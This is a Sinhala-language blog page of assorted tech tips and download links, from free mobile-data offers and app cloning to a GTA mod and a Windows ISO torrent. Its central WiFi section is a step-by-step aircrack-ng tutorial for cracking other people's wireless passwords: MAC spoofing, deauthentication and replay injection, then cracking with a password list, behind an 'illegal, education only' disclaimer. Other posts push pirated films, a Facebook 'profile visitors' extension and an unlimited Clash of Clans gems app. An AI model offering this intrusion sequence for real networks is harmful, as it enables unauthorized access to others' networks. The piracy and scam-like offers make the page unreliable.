ශ්‍රී ලාංකීය වෙබ් කලාවේ නවතම පෙරලිය

Showing posts with label Download. Show all posts
Image result for Dialog Freezone
මේකට ගිහින් කරන්න තියෙන්නේ බොහොම පොඩි දේවල්. Facebook Like කරන, Youtube Videos බලන වගේ බොහොම සුළු දේවල්. හැබැයි එකට ඔයාට නොමිලේ Reload, SMS, DATA  ලබා ගන්න පුළුවන්.
කිසි දිනුම් ඇදීමක් නෑ. හැමෝටම ගන්න පුළුවන්. හැබැයි කාලෙන් කාලෙට නොමිලේ දෙන දේවල් වෙනස් වෙනවා. රුපියල් 50ක් දක්වා reload දුන් අවස්ථාත් තියනවා
මුලින්ම මේකයි කරන්න තියෙන්නෙ. 

මුලින්ම පල්ලෙහා link එකේ තියන site එකට යන්න.


https://freezone.lk/



කළුපාටින් රවුම් කරල තියෙන තැන Login කියල තියෙන්නෙ ඒතන ක්ලික් කරන්න,
ඊට පස්සේ ඔබේ ඩයලොග් දුරකථන අංකය දීලා Log වෙන්න

 එතකොට Phone එකට SMS  එකක් එයි. ඒක Yes  කරාම auto website එකට log වෙනවා.



හරි දැන් කරන්න තියෙන්නෙ, මේකේ මේ වගේ තියෙන ලින්ක් වලට ගිහිල්ල ඒකෙ තියෙන දේ කරන්න. පොඩි පොඩි වැඩ තියෙන්නෙ. FB Like, Share, වගේ පොඩි පොඩි වැඩ කරන්න තියෙන්නෙ. 


මේ වගේ තියෙන Deal




මේ තියෙන්නෙ මට හම්බුන එකක්.



තවත් මේ වගේ පෝස්ට් එකකින් හම්බෙමු...



ගොඩක් දෙනා බලාන හිටිය නේද Fast And Furious 8 release වෙනකම්. අප්‍රේල් 14 release උනාට ඉතිං තාම හෝල් වලනෙ තියෙන්නෙ. වැඩට යන අපි කෝමද හෝල් වලට ගිහිල්ල බලන්නෙ ඔන්න මං ගෙනාව Fast And Furious 8 කට්ටිය ඒනං බලන්න
හොර බොරු නෑ වංචා නෑ ලින්ක් එක ක්ලික් කරල බලන්න



ගොඩක් අයට තියන කරදරයක් තමයි Deta කැපෙන කැපිල්ලට internet එකත් එක්කම එපා වෙන එක. මොනා කරන්නද ඉතිං Dialog පාවිච්චි කරන අයනම් මේක සුපිරියටම අත්විදිනවනේ. කොහොමද වෙනස සැපද? Deta Card එක මේ දානව මේ නෑ නේද? මොනා කරන්නද පුතා ලබා උපන් හැටි තමා මේ.... හරි හරි ඕකට විසදුමක් තමා මං ගෙනාවෙ. Town වල ඉන්න අයටනම් මේක ඉතිං සෑහෙන්න වටිනව.ගමේ කියල වෙනසක් නෑ ඉතිං හැමතැනම වගේ දැං wifi තියනවනෙ. අද මං ගෙනාවෙ ඔයාල හැමතැනම හොයන වගේම ගොඩක් අය අහුවෙලා තියන දෙයක්

Wifi Hacking
කට්ටිය ගොඩක් දෙනා මේ ගැන උනන්දුයිනෙ. ගොඩක් කට්ටිය මගෙන් ඇහුව ඇත්තටම මේ wifi hack කරන්න පුලුවන්ද කියල, අද අපි බලමු කොහොමද මේක කරන්නෙ කියල.
බොරු ප්‍රෝඩා නෑ මාත් කරන විදිහම තමා මේ. 100෴ වැඩ කරනවා ඒ ගැන බයවෙන්න එපා.
Automated application එකක්නම් නෙමෙයි මචං මේක. අපි විසිම්ම කරන දෙයක්. කට්ටිය ගොඩක් Automated application වලට අහුවෙනවනේ .
දැං බලමු කරන විදිහ.
මේකට ටිකක් deta ඕන මොකද ටිකක් ලොකු files download කරන්න තියනවා.
5Gb විතර තියාගෙන වැඩේට බහින එක හොදයි නැත්තම් මගදි deta ඉවර වුනොත්
හරි මුලින්ම මේ ටික ඕන කරනව මේ වැඩේට.

Compatible Wireless Adapter

Linax BackTrack 5r3 DVD

password list

Virtual Matchine

WiFi තියෙනම් Compatible Wireless Adapter එකක් ඔයාල ගාව තියෙනවනෙ.
BackTrack 5r3 නැති කට්ටිය මෙතනින් ගිහින් අරගන්න.

Virtual Machine එකෙන් ඔයාගෙ පරිගනකට ස්තාපනය කරගන්න.ඒකට මම බාවිතා කරේ  VmWare මෘදුකාංගය.

හරි මචංල දැං ඕන  ටික Download කරගත්තනෙ එහෙනම්. දැං තියෙන්නෙ සුභ මොහොතින් වැඩේට බහින එක තමා,
දැං ඔයාලයට කරන්න තියෙන්න virtual box එකෙන් Linax BackTrack 5r3 Os එක run කරගන්න.
දැන්  ඔයාල Shell  Commands එකක් Open කරගන්න.ඒකෙ මේ විදානය දෙන්න.එතකොට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනවා.
airmon-ng



මෙතන පෙන්නන ra0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට  ඔයාලට හැමදේම කියන්නෙ. ඔයාලා ra0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම හොඳේ.
දැන් මේ විදානය දෙන්න.

airmon-ng stop ra0



මෙතනදි අපි කරන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න.දැන් මේ විදානය දෙන්න.

ifconfig ra0 down



දැන් මේ විදානය දෙන්න.

macchanger --mac 00:11:22:33:44:55 ra0


දැන් මේ විදානය දෙන්න.
airmon-ng start ra0


මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද බලන එක. දැන් මේ විදානය දෙන්න.

airodump-ng ra0


මේකෙ BSSID Code එක Copy කරල තියාගන්න.මොකද ඉස්සරහට ඕන වෙනව.දැන් මේ විදානය දෙන්න.

airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0


මෙතනදි අපිට පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න.. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න.

දැන් මේ විදානය දෙන්න.

aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0


දැන් මේ විදානය දෙන්න.

aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0


දැන් මේ විදානය දෙන්න.

aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)


ඊට පස්සෙ අපිට පුලුවන් දැනට ලොග් වෙල් ඉන්න කෙනාගේ උදවුවෙන් ලොග් වෙල ඉන්න WiFi නෙට්වර්ක් එකේ Pass Key එක ලබා ගන්න. ඒකට පහල විදානය දෙන්න. මෙතන් list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත් එක දෙන්න ඕනේ.

aircrack-ng crackwpa-01.cap –w list




ඔන්න KEY එක හොයා ගත්ත. දැන් ඉතින් අපිට පුලුවන් ඒ පාස් කී එක බාවිතා කරල අපිට ඕනේ විදියට නෙට්වර්ක්  එකා බාවිතා කරන්න.

සැ.යු. මෙය නීති විරෝධී කටයුත්තක් බැවින්  කිසිම දේකට වගකියනු නොලබේ. අධ්‍යාපනය සඳහා පමණක් භාවිතා කරන්න කියල ඉල්ලා සිටිනව.












කට්ටියට ඉතිං ක්‍රිකට් කිව්වොත් කන්න ඕනත් නෑනෙ, සමහර අය ඉතිං මැච් එකක් තියන දවසට ලෙඩ නිවාඩු දාල ගෙදරට වෙලා ඉදල මැච් එක බලනවනෙ. තවත් සමහරු මැච් එකේ ලකුණු බලාගන්න sms service ඇක්ටිව් කරගෙන මාසෙකට රුපියල් 100 විතර ගෙවනවනෙ.

සල්ලි දීල ඇක්ටිව් කරගන්න එක ගොඩක් අයට කරදරයක්නෙ මේක මම ඔයාලට දෙනව නිකම්ම.
මේකටත් ඉතිං android පෝන් එකක් ඕන. නෝමල් අයට හදාගන්න විදිහක් මම පස්සෙ දාන්නම්
මේකට කරන්න තියෙන්නෙ මුලින්ම මේ ඇප් එක දාගන්න පෝන් එකට


Download


දැන් ඔයාගෙ පෝන් එකට ඉන්ස්ටෝල් උනාට පස්සෙ කරන්න තියෙන්නෙ ඔයාගෙ display ටච් කරගෙන ඉන්න ඊට පස්සෙ එන මෙනු එකේ Widget කියල තියනව ඒක ටච් කරන්න ඊට පස්සෙ ඔයා දාගත්ත ඇප් එකේ නමින් ඇති Widget එකක් ඒක ටච් කරගෙන ඉදල ඔයාගෙ Desktop එකට ඇඩ් කර ගන්න
ඔන්න එහෙනම් අපි කැපුන
ශෙයා පාරක් දාල සප් එකක් දෙන්න

ගෑනුලමයින්ටනම් wrong නම්බර් වලින් මාර කරදරේනෙ ආයෙ ඉතිං මං අමුතුවෙන් කියන්න ඕන නෑනෙ .. ඒවට රැවටිලා ගොඩක් අය අමාරුවෙ වැටෙන අවස්තා ගොඩයිනෙ. අද පත්තරයක් බැලුවම පේනවනෙ ඒක.
ඒකට හොද විසදුමක් මං අද ගෙනාව. ඒ තමයි wrong නම්බර් වලින් කෝල් එනකොට කතාකරන කෙනාගෙ නමත් එක්කම පෙන්නනව තියනවනම් පොටෝ එකත් පෙන්නව. wrong  නම්බර් වලට රැවටෙන්න ඕන නෑ ආයෙ.
මේකට ඔයාට පෝන් එකක් තියෙන්නම ඕන නෑ.
මෙහෙමයි වැඩේ කරන්නේ
මුලින්ම මේ සයිට් එකට යන්න

මෙන්න මෙතන ඔයාට ඕන නම්බර් එක ගහල සර්ච් කරන්න



ඔච්චර නටන්න ඕන නෑ ඔයාලගෙ පෝන් එකට මේ ඇප‍් එක දාගත්තම කෝල් එක එනකොටම නමත් එක්ක පෙන්නව

මේකෙ android වලට 
මේක iOS වලට


ගොඩක් අයට තියන ප්‍රශ්නයක් තමා කෝච්චියෙ යන්න ගියාම කෝච්චිය තියන වෙලාව දන්නෙ නැතුව ගිහිල්ල රස්තියාදු වෙන එක
ඒකට ඉතිං හොදම පිලියමක් මං ගෙනාව , දැං ඉතිං රස්තියාදු වුන කාලෙ ඉවරයි, ගෙදර ඉදන් වෙලාවටම යන්න පුලුවන්,හරි මේකයි කරන්න තියෙන්නෙ
මේ ලින්ක් එකට ගිහිල්ල මේ ඇප් එක බා⁣ගන්න තියෙන්නෙ ඔයාට ඕන station එකක් දීල බහින station එකත් දීල තියන සේරම කෝච්චි බලන්න පුලුවන්


සමහර කෙල්ලො කොල්ලො ඉන්නවනෙ හිතිං ආදරේ කරන අය. මොකද කිව්වොත් ආදරේ ප්‍රකාශ කරන්න
බය තියන අය, එහමෙ කනෙක් අපි ගැනත් සැලකිලිමත් වෙනවද කියල අපිට දැනගන්න බෑනෙ නේද? මොකද අපිට අනුන්ගෙ හිත් කියවන්න බෑනෙ. අද මං ගෙනාව  ඔයාලට නොකියම ඔයාගෙ facebook Profile එක ගැන සැලකිලිමත් වෙන අය හොයාගන්න ක්‍රමයක්, ඔයාටත් නොකියම ඔයාගෙ facebook Profile එකට ඇවිල්ල යන අය මේකෙන් බලාගන්න පුලුවන්.
හරි අපි බලමු මේක අපි කොහොමද කරන්නෙ කියල,
මේක කරන්න ක්‍රම දෙකක් තියනව. ලේසිම විදිහ කියල දෙන්නම්, අනිත් ක්‍රමයත් ඕනනම් comment  එකක් දාන්න.
හැබැයි මුලින්ම කියන්න ඕන මේක පෝන් එකෙන් කරන්න ඕනනම් google chrome එක තියෙන්න ඕන.
මුලින්ම ඔයාගෙ ක්‍රෝම් බ්‍රව්සර් එක ඕපන් කරගන්න.

දැං මෙන්න මේ ලින්ක් එකට ගිහිල්ල තියන Extention එක දාගන්න.

හරි දැන්  ක්‍රෝම් බ්‍රවුසර් එක ක්ලෝස් කරල ආපහු ඕපන් කරගන්න,

දැං ඔයාලගෙ facebook ගිනුමට ලොග්වෙන්න, ඊට පස්සෙ ඔයාගෙ facebook Profile එකේ පෙන්නනව Visitors කියල button එකක්


click කරාම popup මැසේජ් එකක් එනව ඔයාගෙ facebook Profile එක බැලුව අයගෙ facebook Profile එක එක්කම.


ඔන්න වැඩේ හරිනෙ එහෙනම් අපි කැපුන.

ශෙයා පාරක් දාල අපිටත් සප් එකක් දෙන්න,

ගොඩක් දෙනෙක්ට තියෙන ප්‍රශ්නයක් තමා Fb app එකෙන් එකවුන්ට් දෙකකට එකපාර යන්න බැයිද කියන එක, එ් වගෙම තමා Viber,whtsapp,imo මේවගෙන් තව නම්බර් එකකින් තව එකවුන්ට් එකක් එකම පෝන් එකට හදන්න බැයිද කියන එක,  fb එකටනං ගොඩක් අය facebook lite ඇප් එක තියාගෙන එකවුන්ට් දෙකක් පාවිච්චි කරනව. නමුත් lite ඇප් එකේ ඔරිජිනල් ඇප් එක තරම් features නෑනෙ.
අද මං ගෙනාවෙ මේකට හොදම විසදුමක්, එකම පෝන් එකෙන් එකවුන්ට් දෙකක් නෙමෙයි සීයක් වුනත් හදාගෙන පාවිච්චි කරන්න පුලුවන් වැඩක් තමා මේක, එක එක ඇප් දාන්න ඕන නෑ , තියන ඔරිජිනල් ඇප් එකෙන්ම වැඩේ කරන්න පුලුවන්



එහෙනම් අපි බලමු මේක කරන්නෙ කොහොමද කියල,
මුලින්ම් ඔයාල යන්නකො playstore එකට

හරි දැං search bar එකේ search කරන්න app cloner කියල,

මේ තියෙන්නෙ ඇප් එක. මේක බාගන්න ඔයාල,
හරි දැං බාගත්ත අය මේක Open කරගන්න,

Open කරගත්ත අයට මෙන්න මේ වගේ screen එකක් එයි. 




හරි දැං කට්ටියට එකවුන්ට් දෙකක් හදාගන්න ඕන ඇප් එක හොයාගන්න,
(උදාහරනෙකට ගත්තෙ Facebook එක)

දැං මේ විදිහෙ screen එකක් එයි ඔයාලට



හරි දැන් ඔයාලට මෙතනදි තමා ඔයාල හදාගන්න ඇප් එකේ විස්තර වෙනස් කරන්නෙ. කැමති නමක් දාගන්න, කැමති icon එකක් දාගන්න, ඕනම වෙනස්කමක් කරන්න පුළුවන් මෙතනදි. හැබැයි හදල ඉවර උනාට පස්සෙනම් ඉතිං බෑ වෙනස් කරන්න,
සැ.යු. අනිවාර්යෙන්ම නම වෙනස් කරගන්න නැත්තම් ඔයාට බැරිවෙයි ඇප් දෙක වෙනස් කරල අදුනගන්න,

හරි දැං ඔයාලට ඕන සේරම වෙනස්කම් ටික කරල ඉවර වුනාට පස්සෙ මේ හරිය ක්ලික් කරල ඇප් එක හදාගන්න.


දැං කරන්න තියෙන්නෙ ඉතිං ඇප් එක ඉන්ස්ටෝල් කරගෙන අනිත් එකවුන්ට් එකෙන් ලොග් වෙන්නයි,
එහෙනං අපි කැපුන,
ශෙයා කරල අපිටත් සප් එකක් දීලම යන්න

ෆේස්බුක් එකේ Funnyවීඩියෝ නිර්මාණයකර ශෙයා කරලා ජනප්රිවය වූ ගප්පියාගේ ටී-ශර්ට් සෙට් එක ඔයාලා දන්නවා ඇති. 

ඔන්න දැන් GTA V ගේම් එක සෙල්ලම් කරන අයට ඒ ටී ශර්ට් පැක් එක අපි හදුන්වාදෙනවා. ලංකාවේ අයට තමන්ගෙ අනන්ය තාවය තියාගෙන මෙම ගේම් එක සෙල්ලම් කරන්න මේ ක්ර මයෙන් පුළුවන්. බලන්න screenshots ටිකක් දාන්නම් .








මේ මොඩ් එක ඉන්ස්ටෝල් කරන හැටි ගැන සම්පූරණ විස්තරයත්, ඩවුන්ලෝඩ් කරගන්න විදිහත් මේ ලින්ක් එකට පිවිස දැනගන්න පුලුවන්. ඒ වගේම තවත් දෙයක් වෙන්නෙ ඔයාල ගේම් එක මොඩ් කරන්න කලින් අනිවාර්යෙන්ම මොඩ් කරන ෆයිල් එක Backup කරන්න මතක තියාගන්න.

android පෝන් එකෙන් Youtube වීඩියෝ බාන්න ඇප් එකක්
ගොඩක් අය මගෙන් අහන ප්‍රශ්නයක් තමා android පෝන් එකට youtube වීඩියෝ බාන්න ක්‍රමයක් නැද්ද කියල. හරි හරි youtube විතරක්ම නෙමෙයි බං ජිල් බාන්නත් පුලුවන් එක බය වෙන්න එපා.
මේ ඇප් එක,
Facebook
Youtube
Dailymotion
vimo
google
youku
daum
leTV
මේ වගේ ගොඩක් සයිට් වලට සපෝට් කරනව.
playstore එකේනං යූටියුබ් බාන්න ඇප් ගොඩක් තියනව. ඒව ඉතිං ලෙඩ ගොඩවල්නෙ. අපට කැමති කොලිටියකට බාන්න බෑනෙ සමහර ඒව. මං දෙන ඇප් එකේනං ඉතිං සෑහෙන්න වැඩ ගොඩක් පුලුවන්.
මං කියල දෙන්නම් කොහොමද බාන්නෙ කියල.
මුලින්ම මෙන්න මේ ලින්ක් එකට ගිහිල්ල බාගන්න මේ ඇප් එක.


හරි දැං ඕක install කරගන්න
open කරගන්න
දැං කරන්න තියෙන්නනෙ
ඕන වීඩියෝ එක search කරල play බට්න් එක ක්ලික් කරන්න
ඊට පස්සෙ එන මෙනු එකේ උඩ ඉදං පහලට තියෙන්නෙ ඔයාට බාන්න පුලුවන් කොලිටි ටික
එතනින් ඔයාට ඕන එකක් සිලෙක්ට් කරන්න. ( කොලිටිය වැඩි වෙන්න වැඩි වෙන්න size එකත් වැඩි වෙනව)
දැං පහල කොලපාටින් තියන download එක ක්ලික් කරන්න.
දැං notification බාර් එකේ පෙන්නව download වෙනව.
flv 240p
3GP 114p
3GP 240p
MP4 360p
WebM 360p
M4A Audio mp3 / M4AP

මේ කොලිටි වලින් බාන්න පුලුවන් ඔයාලට.
සි‍ංහල නිවැරදිව ටයිප් කරන්න උදව්කරන මෘදුකා‍ංගය.

කාර්යාලයේ හෝ ඔබගේ නිවසේ පරිගණකයේ වර්ඩ්, ෆොටෝශොප් වැනි මෘදුකා‍ංග වල වැඩ කරනවිට සිංහල ෆොන්ට් බාවිතා කර අකුරු ටයිප් කිරීමේදී සමහර ඉස්පිලි පාපිලි වදින්නේ අඩුපාඩු සහිතවයි,
අන්න ඒ වැරැද්ද නිවැරදි කරන්න පුලුවන් වටිනා මෘදුකා‍ංගයක් තමයි මේ sinhala writer මෘදුකාංගය. 
මෙය ඉන්ස්ටෝල් නොකර ඩබල් ක්ලික් කරලා open කරන්න තියෙන්නේ (portable) . ඉස්පිලි පාපිලි ගානට සෙට් වෙනවා වර්ඩ් ෆොටෝෂොප් හැම ඒකකම කිසි ප්‍රශ්නයක් නැතුව වැඩ කරනවා ඉංග්‍රිසි වලට මාරුෙවන්න නම් මේක closeකරලා දාන්නයි තියෙන්නෙ. වැඩේ ලේසියි පහසුයි

බලන්න ස්ක්‍රීන්ශොට් එකක්.


බාගන්න එහෙනම්

කොහොමද කට්ටියට....
කස්ටිය ඔන්ලයින් ගේමින් ගහනවනෙ දැං වැඩිපුර.. coc එහෙම... සමහරක්ටනං ඉතිං coc කිව්වොත් කන්න ඕනත් නෑ... =D... ඕක ගහන අයට ඉතිං ගොඩක් ඉවසන්න වෙනවනෙ මොකද කාලයත් එක්කනෙ ගේම ගහන්න වෙන්නෙ. නැත්තං ඉතිං සන්තකේටම තියන ජෙම්ස් ටිකට අඹ සරණයිනෙ, කොහොමද කස්ටියට බලාන ඉන්නෙ නැතුව බේස් එක හදාගන්න තියනවනං නේද ඉතිං...
හරි අද අපි බලමු කොහොමද Unlimited Gems, Golds, Elixirs දෙනව කිව්වොත්.



හරි හරි කලබල නොවී හිටු.😂😂
මෙහෙමයි වැඩේ කරන්නේ. මුලින්ම දැං තියන coc එක අයින් කරගන්න. නැත්තං වැඩේ සාර්තක වෙන්නෙ නෑ. ඊට කලින් ඩේට ටිකත් clear කරගෙන ඉන්න. හරි දැං අයින් කරගත්තනං මෙන්න මේ ලින්ක් එකට ගිහිල්ල තියන ඇප් එක බාගන්න. Google Play එකත් update කරල නැත්තං update කරගන්න .
හරි දැං ඔයාල බාගත්ත ඇප් එක ඉන්ස්ටෝල් කරගන්න.
මුලින්ම open කරනකොට ටිකක් වෙලා යයි. ඒක ගැන හිතන්න එපා.
එහෙනං කැමති තරම් Gems, Golds, Elixirs අරං බේස් එක හදාගන්න.
කොච්චර ගත්තත් බඩු ඉවර වෙන්නෙ නෑ.
එහෙනං ඔන්න අපි කැපුන.😳

පිස්සෙක් වගේ පිස්සෙක් වගේ coc ගහන්න 😉😉😉
sms ගහනව කිව්වම අපේ කොල්ලොන්ට කෙල්ලන්ට ඉතිං වෙන වැඩක් නෑනෙ... අපල් පාවිච්චි කරන අය දන්නවනේ කෑල්ල හම්බෙන්න යනකොට හොර කෑල්ලට යවපු මැසේජ් ටික සේරම ඩිලීට් කරන්න වෙනව කියල  .....

මොනා කරන්නද ඉතිං අපේ ඈයො කොහොම හරි මැසේජ් ටික ඩිලීට් කරනවනෙ දුකෙන් හරි... මං අද කියල දෙද්න යන්නෙ ඒකට විසදුමක්...

කොහොම හරි උබල කෑල්ලට මැසේජ් මාට්ටු කරගෙන ගුටි කන එව්වටනං මං වගකියන් නෑ....

කතා ඇති බහිමු වැඩේට.............

  1. ඇපල් තියන අය යන්නකො ඇප් ස්ටෝර් එකට

  2. දැං සර්ච් කරන තැන ගහන්නකො cover me කියල
  3. හරි දැං ඔය ඇප් එක බාගන්න
නැත්තං මේං මේ ලින්ක් එකට ගිහිල්ල බාගන්න දෙකම එකයි. 


Icon වල තිබෙන දේවල් Preview කරලා දෙන මෘදුකා‍ංගයක්.

අපේ ග්‍රැෆික් කරන යාලුවන්ට තියෙන ලොකුම ගැටලුව තමා psd එක නැත්තම් ai එකේ තියෙන්නෙ මොකක්ද කියල දැනගන්න ඒක open කරලම බලන්න ඕන එක. 
වැඩක් කරමින් ඉන්නකොට ඕක මහා එපා කරපු වැඩක්නෙ, මොකද කස්ටිය දන්නවනෙ photoshop එකේ එහෙමත් නැත්තම් Illustrator එක වැඩ කරමින් ඉන්නකොට මැෂින් එක කොච්චර ස්ට්‍රක් වෙනවද කියල, ඉතිං ඒ වෙලාවට තවත් file එකක් ඕපන් කරන්න දාල තේ එකක් එහෙමත් බීල ආවෑකිනෙ ☺ ☺ 

ඒකට විසදුමක් තමා මම අද ගෙනාවෙ...

psd එක open  කරන්නෙ නැතුවම Preview එකක් බලාගන්න පුලුවන්නම් කොච්චර දෙයක්ද නේද.
එහෙනම් මෙන්න මේ ලින්ක් එකට ගිහිල්ල බාගන්න මේ පොඩි සොෆ්ට් එක බාගෙන ඉන්ස්ටෝල් කරගන්න... 
ඊට පස්සෙ පොඩි රීස්ටාට් පාරකුත් දාලම වැඩේ චෙක් කරල බලන්න....

Preview කිරීමට සහාය දක්වන ෆයිල් ෆෝමැට් වර්ග

.bmp
.gif
.jpg
.pcx
.png
.psd
.psp
.tga
.tiff
.wbmp
.xyz

මෙතනින් පිවිස බාගන්න 




හායි යාලුවනේ කොහොමද ඔයාලට,අද මම ඔයාලට ගෙනාවෙ ගොඩක් වැදගත් දෙයක්,සමහර අයනම් මේක ගැන දන්නවත් ඇති,කමක් නෑ නොදන්න අයට තමයි මේ ගෙනාවෙ, හරි වැඩි කතා ඕන නෑ 

Windows 7,8,8.1,10 මේ සේරම එකම iso එකක තියනව කීවම කස්ටිය බලනව ඇති මොන මගුලක්ද මේ කියල, හරි හරි ඒව අදාල නෑනේ 

මුලිම්ම ගන්නකෝ ටොරන්ට් මෙන්න ලින්කුව

හරි දැං ටොරන්ට් ගත්තනෙ,ටොරන්ට් install කරගන්නකො එහෙනං,

දැං එහෙනං iso එක බාගම්මු, මේක 11gb තියනව පුතේ..... එක නිසා ඩේට ඒම තියනවද බලලම වැඩේ පටංගන්න

 හරි ඒනං ඒකත් ගන්නකෝ....
 
හැබැයි පුතේ මේක DVD වලටනං ගහන්න බෑ, bootabe flash drive එකක් හරි bootable portable hdd එකකට හරි තමයි ගහන්න වෙන්නෙ,
පෙන් එකේ 16GB වත් ඉඩ තියෙන්න ඕන...

බාගෙන අල හාරන්නයෑ dvd එකටවත් ගහන්න බැරිනං නේද මචංල,
ඔන්න ඒනං bootable flash එකක් හදන විදියත් කියල දෙන්නම්කෝ...

හරි ඉස්සෙල්ලම මෙන්න මේ WindowsToUSB Lite කියන මෘදුකාංගය බාගන්න.



 Download කරගත්තු windowstousblite මෘදුකාංගය Open කරගන්න. Install කිරීමක් අවශ්‍ය නෑ. 

ඊට පස්සේ  ඔයාලා Bootable USB Flash Drive එක හදාගන්න Source File එක තෝරන්න. ( Windows ISO File එක )




ඒක තෝරලා Source Path එකත් Browse කරලා තෝරලා දෙන්න. 

ඊට පස්සේ " Start " ක්ලික් කරන්න. ( පිලිවෙලින් පහත රූපසටහන්. ) 





දැන් ඉතින් වැඩේ ඉවරයි. ඔයාලා ආයේ OS එක දාද්දි Bios වලින් First Boot Device එක USB විදිහට වෙනස් කරලා ළෙසියෙන්ම OS එක දාගන්න පුලුවන්.
අවුලක් තිබ්බොත් කොමෙන්ට් එකක් දාගෙනම යන්න...
Copyright © 2013 ...:::SDJ:::...